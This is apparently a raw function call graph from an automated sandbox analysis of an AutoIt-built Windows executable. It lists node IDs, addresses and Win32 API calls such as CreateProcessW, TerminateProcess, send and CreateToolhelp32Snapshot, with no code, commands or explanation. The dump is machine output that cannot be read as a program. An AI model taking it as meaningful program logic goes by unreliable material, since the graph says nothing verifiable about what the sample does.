Mailbox 108398->107949 108402 f8a68d 108402->108455 109307 f5d520 85 API calls 4 library calls 108402->109307 108403 f8a289 108452 f8a3e9 108403->108452 109287 f1d2d2 108403->109287 108405 f23793 108405->108402 108405->108455 108457 f2396b Mailbox _memmove 108405->108457 109274 f110e8 108405->109274 108409 f2384e 108423 f8a60c 108409->108423 108424 f238e5 108409->108424 108409->108457 108410 f8a583 108414 f1fa40 401 API calls 108410->108414 108411 f8a45c 109301 f5d520 85 API calls 4 library calls 108411->109301 108416 f8a5b5 108414->108416 108426 f1d380 55 API calls 108416->108426 108416->108455 108417 f8a40f 109298 f2cf79 49 API calls 108417->109298 108418 f8a303 108428 f8a317 108418->108428 108439 f8a341 108418->108439 109306 f5d231 50 API calls 108423->109306 108429 f3010a 48 API calls 108424->108429 108430 f8a5e6 108426->108430 108427 f8a42c 108433 f8a44d 108427->108433 108434 f8a441 108427->108434 109293 f5d520 85 API calls 4 library calls 108428->109293 108445 f238ec 108429->108445 109305 f5d520 85 API calls 4 library calls 108430->109305 108431 f1fa40 401 API calls 108431->108457 109300 f5d520 85 API calls 4 library calls 108433->109300 109299 f5d520 85 API calls 4 library calls 108434->109299 108436 f2bc5c 48 API calls 108436->108457 108442 f8a366 108439->108442 108446 f8a384 108439->108446 108440 f3010a 48 API calls 108440->108457 109294 f6f211 401 API calls 108442->109294 108443 f1d89e 50 API calls 108443->108457 108450 f2399f 108445->108450 108447 f8a37a 108446->108447 109295 f6f4df 401 API calls 108446->109295 108447->108455 109296 f2baef 48 API calls _memmove 108447->109296 108453 f1c935 48 API calls 108450->108453 108454 f239c0 108450->108454 109297 f5d520 85 API calls 4 library calls 108452->109297 108453->108454 108454->108455 108458 f8a65e 108454->108458 108461 f23a05 108454->108461 108455->108398 109285 f5d520 85 API calls 4 library calls 108455->109285 108457->108403 108457->108410 108457->108411 108457->108430 108457->108431 108457->108436 108457->108440 108457->108443 108457->108450 108457->108455 109282 f1d500 53 API calls __cinit 108457->109282 109283 f1d420 53 API calls 108457->109283 109284 f2baef 48 API calls _memmove 108457->109284 109302 f6d21a 81 API calls Mailbox 108457->109302 109303 f589e0 53 API calls 108457->109303 109304 f1d772 55 API calls 108457->109304 108459 f1d89e 50 API calls 108458->108459 108459->108402 108460 f23a95 108462 f1d89e 50 API calls 108460->108462 108461->108402 108461->108455 108461->108460 108462->108455 108463->107949 108464->107921 108466 f184be 108465->108466 108483 f184ba 108465->108483 108467 f85592 __i64tow 108466->108467 108468 f184d2 108466->108468 108469 f85494 108466->108469 108475 f184ea __itow Mailbox _wcscpy 108466->108475 109311 f3234b 79 API calls 4 library calls 108468->109311 108470 f8557a 108469->108470 108471 f8549d 108469->108471 109312 f3234b 79 API calls 4 library calls 108470->109312 108471->108475 108476 f854bc 108471->108476 108474 f3010a 48 API calls 108477 f184f4 108474->108477 108475->108474 108478 f3010a 48 API calls 108476->108478 108479 f1caee 48 API calls 108477->108479 108477->108483 108480 f854d9 108478->108480 108479->108483 108481 f3010a 48 API calls 108480->108481 108482 f854ff 108481->108482 108482->108483 108484 f1caee 48 API calls 108482->108484 108483->107940 108484->108483 108485->107927 108487 f6cd21 108486->108487 108491 f6cd46 108486->108491 108488 f1ca8e 48 API calls 108487->108488 108489 f6cd2d 108488->108489 108494 f6c8b7 108489->108494 108491->108332 108492->108330 108493->108334 108496 f6c914 108494->108496 108497 f6c8f7 108494->108497 108552 f6c235 401 API calls Mailbox 108496->108552 108497->108496 108498 f6cc61 108497->108498 108499 f6c934 108497->108499 108500 f6cc6e 108498->108500 108501 f6cca9 108498->108501 108499->108496 108530 f4abf3 108499->108530 108548 f2d6b4 48 API calls 108500->108548 108501->108496 108504 f6ccb6 108501->108504 108503 f6c964 108503->108496 108505 f6c973 108503->108505 108550 f2d6b4 48 API calls 108504->108550 108517 f6c9a1 108505->108517 108534 f4a8c8 108505->108534 108507 f6cc87 108549 f597b6 88 API calls 108507->108549 108511 f6ccd6 108551 f5503c 90 API calls Mailbox 108511->108551 108513 f6cadc VariantInit 108520 f6cb11 _memset 108513->108520 108516 f6ca4a 108516->108513 108518 f6ca86 VariantClear 108516->108518 108517->108516 108544 f4a25b 105 API calls 108517->108544 108518->108516 108519 f6caa5 SysAllocString 108518->108519 108519->108516 108521 f6cb8e 108520->108521 108522 f6cbb4 108520->108522 108545 f6c235 401 API calls Mailbox 108521->108545 108546 f5a6f6 102 API calls 108522->108546 108524 f6cbad 108526 f6cc41 VariantClear 108524->108526 108527 f6cc52 108526->108527 108527->108491 108528 f6cbce 108528->108526 108547 f5a6f6 102 API calls 108528->108547 108531 f4ac16 108530->108531 108532 f4ac04 __wsetenvp 108530->108532 108531->108503 108532->108531 108553 f13bcf 108532->108553 108535 f4a8f2 108534->108535 108536 f4a9ed SysFreeString 108535->108536 108537 f4aa7e 108535->108537 108538 f4a90a 108535->108538 108543 f4a9f9 108535->108543 108536->108543 108537->108538 108539 f4aad9 SysFreeString 108537->108539 108540 f4aac9 lstrcmpiW 108537->108540 108537->108543 108538->108517 108539->108537 108540->108539 108542 f4aafa SysFreeString 108540->108542 108542->108543 108543->108538 108557 f4a78a RaiseException 108543->108557 108544->108517 108545->108524 108546->108528 108547->108528 108548->108507 108549->108527 108550->108511 108551->108527 108552->108527 108554 f13bd9 __wsetenvp 108553->108554 108555 f3010a 48 API calls 108554->108555 108556 f13bee _wcscpy 108555->108556 108556->108531 108557->108543 108558->108352 108559->108348 108561 f8787b 108560->108561 108564 f2406c 108560->108564 108726 f5d520 85 API calls 4 library calls 108561->108726 108563 f8788c 108727 f5d520 85 API calls 4 library calls 108563->108727 108564->108563 108571 f240a6 _memmove 108564->108571 108566 f24175 108572 f24185 108566->108572 108725 f6d21a 81 API calls Mailbox 108566->108725 108568 f3010a 48 API calls 108568->108571 108569 f241f1 108569->108378 108570 f1fa40 401 API calls 108570->108571 108571->108566 108571->108568 108571->108570 108571->108572 108573 f878d8 108571->108573 108572->108378 108728 f5d520 85 API calls 4 library calls 108573->108728 108729 f1cdb4 108575->108729 108577 f69515 108734 f5be47 108577->108734 108579 f69522 108580 f6952f send 108579->108580 108581 f69546 108580->108581 108582 f69552 WSAGetLastError 108581->108582 108583 f6956a 108581->108583 108582->108583 108583->108376 108585 f184a6 80 API calls 108584->108585 108586 f5eff2 108585->108586 108740 f578ad GetFullPathNameW 108586->108740 108591 f5f04b CoInitialize CoCreateInstance 108593 f5f070 108591->108593 108594 f5f08e 108591->108594 108619 f184a6 80 API calls 108618->108619 108620 f66fd6 SetWindowTextW 108619->108620 108620->108376 108760 f622e5 108621->108760 108623 f61090 108623->108376 108625 f695e0 108624->108625 108625->108376 108627 f1cdb4 48 API calls 108626->108627 108628 f2f572 108627->108628 108629 f2f57a timeGetTime 108628->108629 108630 f875d1 Sleep 108628->108630 108631 f1cdb4 48 API calls 108629->108631 108632 f2f590 108631->108632 108944 f1e1f0 108632->108944 108636 f15105 108635->108636 108637 f150f6 108635->108637 108636->108637 108638 f1510a CloseHandle 108636->108638 108637->108376 108638->108637 108640 f1d3d2 48 API calls 108639->108640 108641 f7354a 108640->108641 108642 f1d3d2 48 API calls 108641->108642 108643 f73553 108642->108643 108644 f1d3d2 48 API calls 108643->108644 108645 f7355c 108644->108645 108646 f184a6 80 API calls 108645->108646 108655 f735e9 Mailbox 108645->108655 108647 f73580 108646->108647 109200 f73d7b 108647->109200 108655->108376 108719 f184a6 80 API calls 108718->108719 108720 f5dcfc 108719->108720 109257 f56d6d 108720->109257 108722 f5dd06 108722->108376 108723->108375 108724->108376 108725->108569 108726->108563 108727->108572 108728->108572 108730 f1cdc5 108729->108730 108731 f1cdca 108729->108731 108730->108731 108738 f32241 48 API calls 108730->108738 108731->108577 108733 f1ce07 108733->108577 108735 f5be50 108734->108735 108737 f5be55 108734->108737 108739 f5ae06 50 API calls 2 library calls 108735->108739 108737->108579 108738->108733 108739->108737 108741 f17e53 48 API calls 108740->108741 108742 f578df 108741->108742 108754 f2e617 108742->108754 108745 f6267a 108746 f626a4 __wsetenvp 108745->108746 108747 f5f039 108746->108747 108749 f626d8 108746->108749 108751 f62763 108746->108751 108747->108591 108752 f139e8 48 API calls 2 library calls 108747->108752 108749->108747 108758 f2dfd2 60 API calls 108749->108758 108751->108747 108759 f2dfd2 60 API calls 108751->108759 108752->108591 108755 f2e625 108754->108755 108756 f1a2fb 48 API calls 108755->108756 108757 f2e635 108756->108757 108757->108745 108758->108749 108759->108751 108761 f62306 108760->108761 108762 f62365 108761->108762 108763 f6230a 108761->108763 108829 f2f0f3 48 API calls 108762->108829 108764 f3010a 48 API calls 108763->108764 108766 f62311 108764->108766 108767 f6231f 108766->108767 108816 f15080 49 API calls 108766->108816 108769 f184a6 80 API calls 108767->108769 108772 f62331 108769->108772 108770 f62379 108771 f6234d 108770->108771 108774 f6243f 108770->108774 108775 f623bb 108770->108775 108771->108623 108817 f14bf9 108772->108817 108776 f5be47 50 API calls 108774->108776 108779 f184a6 80 API calls 108775->108779 108780 f62446 108776->108780 108783 f623c2 108779->108783 108832 f5689f SetFilePointerEx SetFilePointerEx WriteFile 108780->108832 108782 f623f6 108798 f567dc 108782->108798 108783->108782 108793 f62400 108783->108793 108787 f62410 108788 f1c935 48 API calls 108787->108788 108789 f6241a 108788->108789 108831 f139e8 48 API calls 2 library calls 108789->108831 108791 f62428 108792 f150ec CloseHandle 108795 f62490 108792->108795 108830 f17b6e 48 API calls 108793->108830 108833 f14592 CloseHandle 108795->108833 108796 f623fe Mailbox 108796->108771 108796->108792 108799 f567f6 108798->108799 108800 f567ec 108798->108800 108802 f567fc 108799->108802 108803 f56808 108799->108803 108850 f56917 SetFilePointerEx SetFilePointerEx WriteFile 108800->108850 108851 f568b9 51 API calls 108802->108851 108805 f56824 108803->108805 108806 f56811 108803->108806 108834 f1a6d4 108805->108834 108807 f1a6d4 48 API calls 108806->108807 108810 f56816 108807->108810 108815 f567f4 Mailbox 108815->108796 108816->108767 108818 f150ec CloseHandle 108817->108818 108819 f14c04 108818->108819 108890 f14b88 108819->108890 108827 f14c44 108827->108770 108829->108770 108830->108787 108831->108791 108832->108796 108833->108771 108835 f3010a 48 API calls 108834->108835 108850->108815 108851->108815 108891 f14ba1 CreateFileW 108890->108891 108892 f84957 108890->108892 108895 f14bc3 108891->108895 108893 f8495d CreateFileW 108892->108893 108892->108895 108894 f84983 108893->108894 108893->108895 108895->108827 108897 f14df0 108895->108897 108945 f1e216 108944->108945 108964 f1e226 Mailbox 108944->108964 108946 f1e670 108945->108946 108945->108964 109074 f2ecee 401 API calls 108946->109074 108947 f5d520 85 API calls 108947->108964 108948 f1e4e7 108950 f1e4fd 108948->108950 109075 f1322e 16 API calls 108948->109075 108950->108376 108952 f1e681 108952->108950 108954 f1e68e 108952->108954 108953 f1e26c PeekMessageW 108953->108964 109076 f2ec33 401 API calls Mailbox 108954->109076 108956 f1e695 LockWindowUpdate DestroyWindow GetMessageW 108956->108950 108959 f1e6c7 108956->108959 108957 f85b13 Sleep 108957->108964 108960 f862a7 TranslateMessage DispatchMessageW GetMessageW 108959->108960 108960->108960 108963 f1e657 PeekMessageW 108963->108964 108964->108947 108964->108948 108964->108953 108964->108957 108964->108963 108965 f1e517 timeGetTime 108964->108965 108967 f1c935 48 API calls 108964->108967 108968 f1e641 TranslateMessage DispatchMessageW 108964->108968 108969 f3010a 48 API calls 108964->108969 108970 f85dfc WaitForSingleObject 108964->108970 108972 f11000 377 API calls 108964->108972 108973 f86147 Sleep 108964->108973 108975 f1e6cc timeGetTime 108964->108975 108979 f85feb Sleep 108964->108979 108986 f85cea Sleep 108964->108986 108988 f11dce 106 API calls 108964->108988 108992 f2cf79 49 API calls 108964->108992 108997 f1fa40 377 API calls 108964->108997 108999 f244e0 377 API calls 108964->108999 109000 f23680 377 API calls 108964->109000 109002 f85cce Mailbox 108964->109002 109004 f1caee 48 API calls 108964->109004 109005 f1d380 55 API calls 108964->109005 109006 f1e7e0 108964->109006 109013 f1ea00 108964->109013 109063 f2f381 108964->109063 109068 f2ed1a 108964->109068 109073 f1e7b0 401 API calls Mailbox 108964->109073 109078 f78b20 48 API calls 108964->109078 109082 f2e3a5 timeGetTime 108964->109082 108965->108964 108967->108964 108968->108963 108969->108964 108970->108964 108974 f85e19 GetExitCodeProcess CloseHandle 108970->108974 108971 f1d3d2 48 API calls 108971->109002 108972->108964 108973->109002 108974->108964 109077 f2cf79 49 API calls 108975->109077 108979->108964 108981 f861de GetExitCodeProcess 108984 f8620a CloseHandle 108981->108984 108985 f861f4 WaitForSingleObject 108981->108985 108984->109002 108985->108964 108985->108984 108986->108964 108987 f78a48 107 API calls 108987->109002 108988->108964 108990 f85cd7 Sleep 108990->108986 108991 f86266 Sleep 108991->108964 108992->108964 108994 f1caee 48 API calls 108994->109002 108997->108964 108998 f1d380 55 API calls 108998->109002 108999->108964 109000->108964 109002->108964 109002->108971 109002->108981 109002->108986 109002->108987 109002->108990 109002->108991 109002->108994 109002->108998 109079 f556dc 49 API calls Mailbox 109002->109079 109080 f2cf79 49 API calls 109002->109080 109081 f11000 401 API calls 109002->109081 109083 f6d12a 50 API calls 109002->109083 109084 f58355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109002->109084 109085 f2e3a5 timeGetTime 109002->109085 109086 f56f5b CreateToolhelp32Snapshot Process32FirstW 109002->109086 109004->108964 109005->108964 109007 f1e7fd 109006->109007 109008 f1e80f 109006->109008 109093 f1dcd0 109007->109093 109124 f5d520 85 API calls 4 library calls 109008->109124 109010 f1e806 109010->108964 109012 f898e8 109012->109012 109014 f1ea20 109013->109014 109015 f1fa40 401 API calls 109014->109015 109019 f1ea89 109014->109019 109016 f89919 109015->109016 109016->109019 109132 f5d520 85 API calls 4 library calls 109016->109132 109017 f1eb18 109022 f1d3d2 48 API calls 109017->109022 109038 f1ecd7 Mailbox 109017->109038 109018 f899bc 109135 f5d520 85 API calls 4 library calls 109018->109135 109019->109017 109023 f1d3d2 48 API calls 109019->109023 109019->109038 109024 f89997 109022->109024 109025 f89963 109023->109025 109134 f31b2a 52 API calls __cinit 109024->109134 109133 f31b2a 52 API calls __cinit 109025->109133 109027 f89d70 109144 f6e2fb 401 API calls Mailbox 109027->109144 109029 f1d380 55 API calls 109029->109038 109031 f89dc2 109146 f5d520 85 API calls 4 library calls 109031->109146 109032 f1ef0c Mailbox 109032->108964 109033 f89ddf 109147 f6c235 401 API calls Mailbox 109033->109147 109035 f1fa40 401 API calls 109035->109038 109036 f1342c 48 API calls 109036->109038 109037 f89e49 109149 f5d520 85 API calls 4 library calls 109037->109149 109038->109018 109038->109027 109038->109029 109038->109031 109038->109032 109038->109033 109038->109035 109038->109036 109038->109037 109045 f214a0 48 API calls 109038->109045 109046 f1f56f 109038->109046 109049 f1d805 48 API calls 109038->109049 109050 f89a3c 109038->109050 109051 f5d520 85 API calls 109038->109051 109136 f5a3ee 48 API calls 109038->109136 109137 f6ede9 401 API calls 109038->109137 109142 f4a599 InterlockedDecrement 109038->109142 109143 f6f4df 401 API calls 109038->109143 109044 f89df7 109044->109032 109045->109038 109046->109032 109145 f5d520 85 API calls 4 library calls 109046->109145 109049->109038 109138 f6d154 48 API calls 109050->109138 109051->109038 109053 f89a48 109064 f2f390 109063->109064 109065 f8ee11 109063->109065 109064->108964 109066 f8ee46 109065->109066 109067 f8ee28 TranslateAcceleratorW 109065->109067 109067->109064 109069 f2ed2c 109068->109069 109072 f2ed34 109068->109072 109069->108964 109070 f2ed5e IsDialogMessageW 109070->109069 109070->109072 109071 f8ebec GetClassLongW 109071->109070 109071->109072 109072->109069 109072->109070 109072->109071 109073->108964 109074->108948 109075->108952 109076->108956 109077->108964 109078->108964 109079->109002 109080->109002 109081->109002 109082->108964 109083->109002 109084->109002 109085->109002 109150 f579c2 109086->109150 109088 f56fa4 Process32NextW 109089 f57021 CloseHandle 109088->109089 109090 f56fa0 _wcscat 109088->109090 109089->109002 109090->109088 109090->109089 109156 f3297d 109090->109156 109159 f31bc7 109090->109159 109094 f1fa40 401 API calls 109093->109094 109107 f1dd0f _memmove 109094->109107 109095 f88dbe 109131 f5d520 85 API calls 4 library calls 109095->109131 109097 f88ddc 109097->109097 109098 f1dd70 109098->109010 109099 f1e12b Mailbox 109104 f3010a 48 API calls 109099->109104 109100 f3010a 48 API calls 109100->109107 109101 f1e051 109103 f1e066 109101->109103 109107->109095 109107->109098 109107->109099 109107->109100 109109 f1deb7 109107->109109 109119 f1df29 109107->109119 109109->109099 109111 f1dec4 109109->109111 109112 f88d9e 109114 f1df64 109114->109010 109119->109101 109119->109112 109119->109114 109120 f88d76 109119->109120 109122 f88d51 109119->109122 109126 f15322 401 API calls 109119->109126 109128 f5d520 85 API calls 4 library calls 109120->109128 109127 f5d520 85 API calls 4 library calls 109122->109127 109124->109012 109126->109119 109127->109114 109128->109114 109131->109097 109132->109019 109133->109017 109134->109038 109135->109032 109136->109038 109137->109038 109138->109053 109142->109038 109143->109038 109144->109046 109145->109032 109146->109032 109147->109044 109149->109032 109151 f579e9 109150->109151 109155 f579d0 109150->109155 109170 f3224a 58 API calls __wcstoi64 109151->109170 109154 f579ef 109154->109090 109155->109151 109155->109154 109169 f322df GetStringTypeW __wtof_l 109155->109169 109171 f329c7 109156->109171 109160 f31bd3 109159->109160 109161 f31c48 109159->109161 109169->109155 109170->109154 109201 f1c4cd 48 API calls 109200->109201 109202 f73d89 109201->109202 109203 f1c4cd 48 API calls 109202->109203 109204 f73d91 109203->109204 109205 f1c4cd 48 API calls 109204->109205 109206 f73d99 109205->109206 109258 f56d8a __wsetenvp 109257->109258 109259 f56db3 GetFileAttributesW 109258->109259 109260 f56dc5 GetLastError 109259->109260 109264 f56de3 109259->109264 109261 f56de7 109260->109261 109262 f56dd0 CreateDirectoryW 109260->109262 109263 f13bcf 48 API calls 109261->109263 109261->109264 109262->109261 109262->109264 109265 f56df7 _wcsrchr 109263->109265 109264->108722 109265->109264 109266 f56d6d 48 API calls 109265->109266 109267 f56e1b 109266->109267 109267->109264 109268 f56e28 CreateDirectoryW 109267->109268 109268->109264 109270 f1a9af 109269->109270 109273 f1a9ca 109269->109273 109271 f1b8a7 48 API calls 109270->109271 109272 f1a9b7 CharUpperBuffW 109271->109272 109272->109273 109273->108395 109275 f84c5a 109274->109275 109276 f110f9 109274->109276 109277 f3010a 48 API calls 109276->109277 109278 f11100 109277->109278 109279 f11121 109278->109279 109308 f1113c 48 API calls 109278->109308 109279->108409 109281->108405 109282->108457 109283->108457 109284->108457 109285->108398 109286->108405 109288 f1d2df 109287->109288 109290 f1d30a 109287->109290 109292 f1d2e6 109288->109292 109310 f1d349 53 API calls 109288->109310 109290->108417 109290->108418 109292->109290 109309 f1d349 53 API calls 109292->109309 109293->108455 109294->108447 109295->108447 109296->108452 109297->108455 109298->108427 109299->108455 109300->108455 109301->108455 109302->108457 109303->108457 109304->108457 109305->108455 109306->108450 109307->108455 109308->109279 109309->109290 109310->109292 109311->108475 109312->108475 109313->107963 109314->107963 109315->107963 109316->107963 109317->107963 109318->107991 109319->107966 109320->107969 109321->107962 109322->107971 109323->107978 109325 f723eb _memset 109324->109325 109326 f72452 109325->109326 109327 f72428 109325->109327 109330 f1cdb4 48 API calls 109326->109330 109331 f72476 109326->109331 109328 f1cdb4 48 API calls 109327->109328 109329 f72433 109328->109329 109329->109331 109332 f1cdb4 48 API calls 109329->109332 109335 f72448 109330->109335 109333 f1cdb4 48 API calls 109331->109333 109336 f724b0 109331->109336 109332->109335 109333->109336 109334 f184a6 80 API calls 109337 f724d4 109334->109337 109338 f1cdb4 48 API calls 109335->109338 109336->109334 109339 f13bcf 48 API calls 109337->109339 109338->109331 109340 f724de 109339->109340 109341 f725a1 109340->109341 109342 f724e8 109340->109342 109344 f725d3 GetCurrentDirectoryW 109341->109344 109347 f184a6 80 API calls 109341->109347 109343 f184a6 80 API calls 109342->109343 109345 f724f9 109343->109345 109346 f3010a 48 API calls 109344->109346 109348 f13bcf 48 API calls 109345->109348 109349 f725f8 GetCurrentDirectoryW 109346->109349 109350 f725b8 109347->109350 109351 f72503 109348->109351 109352 f72605 109349->109352 109353 f13bcf 48 API calls 109350->109353 109354 f184a6 80 API calls 109351->109354 109358 f1ca8e 48 API calls 109352->109358 109363 f7263e 109352->109363 109355 f725c2 __wsetenvp 109353->109355 109356 f72514 109354->109356 109355->109344 109355->109363 109357 f13bcf 48 API calls 109356->109357 109359 f7251e 109357->109359 109360 f7261e 109358->109360 109361 f184a6 80 API calls 109359->109361 109362 f1ca8e 48 API calls 109360->109362 109366 f7252f 109361->109366 109367 f7262e 109362->109367 109364 f7268a 109363->109364 109402 f5a17a 7 API calls 109363->109402 109369 f726c1 109364->109369 109370 f7274c CreateProcessW 109364->109370 109371 f13bcf 48 API calls 109366->109371 109372 f1ca8e 48 API calls 109367->109372 109368 f72655 109403 f5a073 7 API calls 109368->109403 109405 f4bc90 69 API calls 109369->109405 109381 f7276b 109370->109381 109375 f72539 109371->109375 109372->109363 109377 f7256f GetSystemDirectoryW 109375->109377 109380 f184a6 80 API calls 109375->109380 109376 f72670 109404 f5a102 7 API calls 109376->109404 109379 f3010a 48 API calls 109377->109379 109382 f72594 GetSystemDirectoryW 109379->109382 109383 f72550 109380->109383 109386 f72780 109381->109386 109387 f727bd CloseHandle 109381->109387 109382->109352 109384 f13bcf 48 API calls 109383->109384 109385 f7255a __wsetenvp 109384->109385 109385->109352 109385->109377 109390 f72791 GetLastError 109386->109390 109388 f727cb 109387->109388 109394 f727f5 109387->109394 109406 f59d09 CloseHandle Mailbox 109388->109406 109389 f727fb 109392 f727a5 109389->109392 109390->109392 109407 f59b29 CloseHandle 109392->109407 109394->109389 109398 f72827 CloseHandle 109394->109398 109398->109392 109399 f71f2b 109399->107864 109401 f726df __wsetenvp 109401->109381 109402->109368 109403->109376 109404->109364 109405->109401 109407->109399 109409 f66b25 GetWindowRect 109408->109409 109410 f66b42 109408->109410 109411 f66b5c 109409->109411 109410->109411 109412 f66b52 ClientToScreen 109410->109412 109411->108023 109411->108026 109412->109411 109413->108029 109414->108033 109415->108038 109424 f6ae3b 109416->109424 109419 f6ad31 htons 109421 f6ad1b 109419->109421 109420 f6ad05 Mailbox 109420->109419 109420->109421 109421->108046 109423 f5d7f2 109422->109423 109423->108053 109425 f1a6d4 48 API calls 109424->109425 109426 f6ae49 109425->109426 109429 f6ae79 WideCharToMultiByte 109426->109429 109428 f6acf3 inet_addr 109428->109420 109430 f6aea7 109429->109430 109431 f6ae9d 109429->109431 109433 f3010a 48 API calls 109430->109433 109432 f2f324 48 API calls 109431->109432 109434 f6aea5 109432->109434 109435 f6aeae WideCharToMultiByte 109433->109435 109434->109428 109436 f2f2d0 48 API calls 109435->109436 109436->109434 109438 f2f057 109437->109438 109439 f2f069 109437->109439 109440 f2f063 109438->109440 109441 f2f05d 109438->109441 109442 f1c4cd 48 API calls 109439->109442 109443 f1a6d4 48 API calls 109440->109443 109444 f1a6d4 48 API calls 109441->109444 109452 f564f5 109442->109452 109445 f5668b 109443->109445 109447 f2f081 109444->109447 109448 f14c4f 50 API calls 109445->109448 109446 f56524 109446->108088 109472 f14c4f 109447->109472 109451 f56699 109448->109451 109458 f566a9 Mailbox 109451->109458 109499 f56765 50 API calls 109451->109499 109452->109446 109497 f5649b ReadFile SetFilePointerEx 109452->109497 109498 f1bd2f 48 API calls _memmove 109452->109498 109454 f849b2 109458->108088 109459 f2f0a3 Mailbox 109459->108088 109461 f17bfb 109460->109461 109462 f17c3a 109460->109462 109464 f3010a 48 API calls 109461->109464 109463 f1c935 48 API calls 109462->109463 109465 f17c0e 109463->109465 109464->109465 109465->108092 109466->108065 109467->108093 109468->108062 109469->108068 109470->108084 109471->108091 109473 f2f324 48 API calls 109472->109473 109476 f14c60 109473->109476 109474 f14c95 109474->109454 109478 f1c610 MultiByteToWideChar 109474->109478 109475 f14ca0 2 API calls 109475->109476 109476->109474 109476->109475 109500 f14d29 109476->109500 109479 f824df 109478->109479 109480 f1c638 109478->109480 109481 f1c4cd 48 API calls 109479->109481 109482 f3010a 48 API calls 109480->109482 109483 f824e7 109481->109483 109484 f1c64f MultiByteToWideChar 109482->109484 109490 f1a6f8 48 API calls 109483->109490 109485 f1c6b7 109484->109485 109486 f1c66c 109484->109486 109487 f1a2fb 48 API calls 109485->109487 109486->109485 109488 f1c675 109486->109488 109489 f1c6c3 109487->109489 109488->109483 109492 f1c686 109488->109492 109489->109459 109491 f824f6 109490->109491 109493 f3010a 48 API calls 109491->109493 109495 f1c68e _memmove 109492->109495 109496 f3010a 48 API calls 109492->109496 109494 f82518 109493->109494 109495->109459 109496->109495 109497->109452 109498->109452 109499->109458 109501 f845cf 109500->109501 109502 f14d3d 109500->109502 109504 f1a6f8 48 API calls 109501->109504 109509 f14d67 109502->109509 109506 f845da 109504->109506 109505 f14d49 109505->109476 109507 f3010a 48 API calls 109506->109507 109508 f845ef _memmove 109507->109508 109510 f14d7d 109509->109510 109513 f14d78 _memmove 109509->109513 109511 f3010a 48 API calls 109510->109511 109512 f84703 109510->109512 109511->109513 109513->109505 109514->108104 109516 f11990 109515->109516 109520 f119af _memmove 109515->109520 109518 f3010a 48 API calls 109516->109518 109517 f3010a 48 API calls 109519 f119c6 109517->109519 109518->109520 109519->108134 109520->109517 109521->108118 109522->108123 109523->108116 109524->108148 109525->108165 109526->108165 109527->108175 109528->108173 109529->108165 109530->108167 109532 f2dd89 109531->109532 109533 f84a7d FindFirstFileW 109531->109533 109532->107864 109534 f84a8e 109533->109534 109535 f84a95 FindClose 109533->109535 109534->109535 109537 f57700 109536->109537 109547 f576f9 _wcsncpy 109536->109547 109538 f3010a 48 API calls 109537->109538 109539 f57706 GetFileVersionInfoW 109538->109539 109540 f57722 __wsetenvp 109539->109540 109541 f3010a 48 API calls 109540->109541 109544 f57739 _wcscat _wcscmp _wcscpy _wcsstr 109541->109544 109542 f31bc7 _W_store_winword 59 API calls 109543 f577f7 109542->109543 109545 f57827 74D41560 109543->109545 109543->109547 109546 f57779 74D41560 109544->109546 109550 f57793 _wcscat 109544->109550 109545->109547 109548 f5783d _wcscmp 109545->109548 109546->109550 109547->108186 109548->109547 109551 f3234b 79 API calls 4 library calls 109548->109551 109550->109542 109551->109547 109552->108205 109553->108207 109555 f1d89e 50 API calls 109554->109555 109556 f11a08 109555->109556 109557 f11a12 109556->109557 109558 f8db7d 109556->109558 109560 f184a6 80 API calls 109557->109560 109559 f17e53 48 API calls 109558->109559 109561 f8db8d 109559->109561 109562 f11a1f 109560->109562 109561->109561 109563 f1c935 48 API calls 109562->109563 109564 f11a2d 109563->109564 109565 f11dce 109564->109565 109566 f11de4 Mailbox 109565->109566 109567 f8db26 109566->109567 109571 f11dfd 109566->109571 109568 f8db2b IsWindow 109567->109568 109569 f11e51 109568->109569 109570 f8db3f 109568->109570 109569->108214 109633 f1200a 109570->109633 109572 f11e46 109571->109572 109574 f184a6 80 API calls 109571->109574 109572->109569 109576 f8db65 IsWindow 109572->109576 109577 f11e17 109574->109577 109576->109569 109576->109570 109580 f11f04 109577->109580 109578 f1197e 48 API calls 109578->109569 109581 f11f1a Mailbox 109580->109581 109582 f1c935 48 API calls 109581->109582 109583 f11f3e 109582->109583 109584 f1c935 48 API calls 109583->109584 109585 f11f49 109584->109585 109586 f17e53 48 API calls 109585->109586 109587 f11f59 109586->109587 109588 f1d3d2 48 API calls 109587->109588 109589 f11f87 109588->109589 109590 f1d3d2 48 API calls 109589->109590 109591 f11f90 109590->109591 109592 f1d3d2 48 API calls 109591->109592 109593 f11f99 109592->109593 109594 f82569 109593->109594 109595 f11fac 109593->109595 109637 f4e4ea 60 API calls 3 library calls 109594->109637 109596 f82583 109595->109596 109598 f11fbe GetForegroundWindow 109595->109598 109599 f1a4f6 48 API calls 109596->109599 109600 f1200a 48 API calls 109598->109600 109634 f12016 109633->109634 109635 f3010a 48 API calls 109634->109635 109636 f12023 109635->109636 109636->109578 109637->109596 109673 f1c4cd 48 API calls 109672->109673 109674 f4e2fe 109673->109674 109689 f1193b SendMessageTimeoutW 109674->109689 109676 f4e305 109681 f4e309 Mailbox 109676->109681 109690 f4e390 109676->109690 109678 f4e314 109679 f3010a 48 API calls 109678->109679 109680 f4e338 SendMessageW 109679->109680 109680->109681 109682 f4e34e _strlen 109680->109682 109681->108226 109683 f4e378 109682->109683 109684 f4e35a 109682->109684 109685 f17e53 48 API calls 109683->109685 109695 f4e0f5 48 API calls 2 library calls 109684->109695 109685->109681 109687 f4e362 109688 f1c610 50 API calls 109687->109688 109688->109681 109689->109676 109696 f1193b SendMessageTimeoutW 109690->109696 109692 f4e39a 109693 f4e3a2 SendMessageW 109692->109693 109694 f4e39e 109692->109694 109693->109678 109694->109678 109695->109687 109696->109692 109698 f184a6 80 API calls 109697->109698 109699 f6f7db 109698->109699 109723 f6f81d Mailbox 109699->109723 109733 f70458 109699->109733 109701 f6fa7c 109702 f6fbeb 109701->109702 109706 f6fa86 109701->109706 109768 f70579 88 API calls Mailbox 109702->109768 109705 f6fbf8 109705->109706 109708 f6fc04 109705->109708 109746 f6f5fb 109706->109746 109707 f184a6 80 API calls 109718 f6f875 Mailbox 109707->109718 109708->109723 109713 f6faba 109760 f2f92c 109713->109760 109716 f6fad4 109766 f5d520 85 API calls 4 library calls 109716->109766 109717 f6faee 109720 f13320 48 API calls 109717->109720 109718->109701 109718->109707 109718->109723 109764 f728d9 48 API calls _memmove 109718->109764 109765 f6fc96 60 API calls 2 library calls 109718->109765 109722 f6fb05 109720->109722 109721 f6fadf GetCurrentProcess TerminateProcess 109721->109717 109724 f214a0 48 API calls 109722->109724 109732 f6fb2f 109722->109732 109723->108231 109725 f6fb1e 